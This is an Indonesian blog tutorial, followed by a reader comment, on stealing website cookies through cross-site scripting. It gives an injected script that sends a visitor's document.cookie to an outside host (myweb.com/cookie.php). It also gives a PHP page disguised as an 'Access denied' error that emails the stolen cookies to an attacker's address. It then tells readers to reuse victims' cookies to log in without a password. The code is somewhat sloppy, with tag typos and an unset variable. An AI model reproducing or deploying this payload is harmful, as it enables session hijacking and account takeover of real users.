Script yang bisa digunakan untuk XSS adalah:
- HTML
- JavaScript
- VBScript
- ActiveX
- Flash
Biasanya syntax (perintah) yang paling sering digunakan untuk mengecek sebuah vulnerability (atau biasa disebut vuln) XSS adalah <script>alert('xss')</script>.
Mencuri Informasi dari Cookie
Cookie adalah berkas yang dibuat oleh sebuah situs internet untuk menyimpan informasi di dalam komputer kamu. Contohnya, pengaturan kamu saat mengunjungi situs tersebut.
Saat kamu mengunjungi situs yang menggunakan cookie, situs mungkin akan meminta Firefox untuk meletakan satu cookie atau lebih di dalam harddisk kamu.
Ketika kamu kembali mengunjungi situs tersebut, Firefox akan mengirimkan kembali cookie milik situs tersebut. Ini memungkinkan situs tersebut untuk menyajikan informasi yang sesuai dengan kebutuhan kamu.
Cookie juga dapat digunakan untuk menyimpan informasi yang berhubungan dengan identifikasi perseorangan, semisal nama, alamat email, alamat rumah atau kantor, atau nomor telpon.
Namun demikian, patut diperhatikan bahwa situs web hanya memiliki akses ke informasi pribadi yang pernah kamu berikan.
Sebagai contoh, situs web tidak dapat mengetahui alamat email kamu kecuali kamu pernah memasukkan alamat email tersebut terlebih dulu. Selain itu, situs web juga tidak dapat mendapatkan akses ke informasi lain di dalam komputer kamu.
Saat menggunakan pengaturan default cookie Firefox, aktivitas cookie tidak akan tampak oleh kamu. Kamu juga tidak akan melihat bagaimana situs web tersebut mengatur cookie yang diperlukan atau saat Firefox mengirim kembali cookie kepada situs web tersebut.
Namun, kamu dapat mengatur cookie pengaturan supaya Firefox menanyakan sebelum cookie akan diterima dan disimpan. Kamu juga bisa membatasi masa kadaluarsa cookie menjadi hanya berlaku pada sesi aktif Firefox kamu.
Dengan teknik grab cookie, sama saja kamu mencuri cookie orang lain dan mungkin saja bisa menggunakannya dengan cara memanipulasi cookie.
Dengan kata lain, kamu bisa saja masuk ke situs tersebut dengan cookie orang lain tanpa mengetahui log in maupun password nya.
Saya akan mengilustrasikan pada sebuah forum. Apabila forum tersebut memiliki celah xss. cobalah kamu memposting dan mencoba menyisipkan syntax seperti berikut.
<script>
window.open("http://www.myweb.com/cookie.php?cookies="+document.cookie);
</script>
Lalu setelah itu buatlah file cookie.php dengan source kurang lebih seperti berikut.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml-transitional.dtd">
<html emlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso=8859-1" />
<title>Error</tittle>
<style type="text/css">
<!--
body,td,th {
color: #FFFFFF;
}
body {
background-color: #000000;
}
-->
</style></head>
<? mail('maling_cookie@yahoo.com', 'Cookie stealed ! - thx god :)', $cookies); ?>
<body>
<h2><strong>Error</strong> - <strong>Access denied</strong> for <? echo $_SERVER["REMOTE_ADDR"]; ?></h2>
</body>
</html>
Perhatikan pada bagian mail('email@example.com'). Pada bagian itulah nantinya cookie target akan terkirim. Jadi, apabila kamu memposting ke sebuah forum yang memiliki vuln xss dan menyisipkan script stealth cookie dan ada target yang membukanya.
Kemungkinan cookie si target akan terkirim ke email maling_cookie@yahoo.com. Kamu bisa memakainya dengan cara memanipulasi cookie orang tersebut.
Demikianlah artikel mengenai Cara Mencuri Cookie dengan Teknik Cross Site Scripting (XSS). Jangan lupa share artikel ini jika bermanfaat dan cantumkan sumbernya. Kalau ada pertanyaan silahkan berkomentar. Terima Kasih!
ini makainya gmana bang? 😆
BalasHapus